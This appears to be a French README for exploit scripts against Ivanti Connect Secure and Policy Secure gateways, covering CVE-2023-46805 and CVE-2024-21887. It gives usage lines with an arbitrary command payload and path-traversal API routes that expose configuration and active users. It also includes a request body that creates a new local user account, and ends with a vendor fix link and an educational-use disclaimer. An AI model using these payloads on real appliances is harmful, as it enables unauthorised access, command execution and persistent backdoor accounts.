
Une vulnérabilité de contournement d'authentification dans le composant web d'Ivanti ICS 9.x, 22.x et Ivanti Policy Secure permet à un attaquant distant d'accéder à des ressources restreintes en contournant les contrôles de sécurité.
Une vulnérabilité de contournement d'authentification dans le composant Web d'Ivanti ICS 9.x, 22.x et Ivanti Policy Secure permet à un attaquant distant d'accéder à des ressources restreintes en contournant les contrôles.
utilisation: ./CVE-2023-46805.sh http(s)://fqdn:port
./CVE-2023-46805.sh https://my.vpn.ip:443

Remarques :
chmod +x CVE-2023-46805.sh
nécessite les applications curl + json_pp
Résultat si vulnérable, vous devriez voir certaines choses :

Une vulnérabilité d'injection de commandes dans les composants Web d'Ivanti Connect Secure (9.x, 22.x) et Ivanti Policy Secure permet à un administrateur authentifié d'envoyer des requêtes spécialement conçues et d'exécuter des commandes arbitraires sur l'appliance.
utilisation: ./CVE-2024-21887.sh http(s)://fqdn:port payload_cmd
./CVE-2024-21887.sh https://my.vpn.ip:443 "touch /tmp/pwned"
Résultat si vulnérable, vous devriez voir certaines choses et votre payload devrait fonctionner :

Remarques :
chmod +x CVE-2024-21887.sh
nécessite les applications curl, xxd, tr & sed
/api/v1/totp/user-backup-code/../../configuration/system/configuration /api/v1/totp/user-backup-code/../../system/active-users
/api/v1/totp/user-backup-code/../../configuration/administrators/admin-realms/realm/Admin%20Users
-créer un compte /authentication/auth-servers/authserver/System%20Local/local/users/user
-H 'Content-Type:application/json' -d '{"change-password-at-signin": "false", "consoleaccess": "false", "enabled": "true", "fullname": "new user", "one-timeuse": "false", "password-cleartext": "new_password", "username": "login_user"}'
Solution de contournement/Correction : https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
Crédits : https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis
plus d'infos sur moi ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Avertissement : IMPORTANT : Ce script est fourni à des fins éducatives, de test éthique et d'utilisation légale UNIQUEMENT. Ne l'utilisez sur aucun système ou réseau sans autorisation explicite. L'accès non autorisé à des systèmes informatiques et des réseaux est illégal, et les utilisateurs pris en flagrant délit d'activités non autorisées sont passibles de poursuites judiciaires. L'auteur n'est PAS responsable des dommages causés par une mauvaise utilisation de ce script.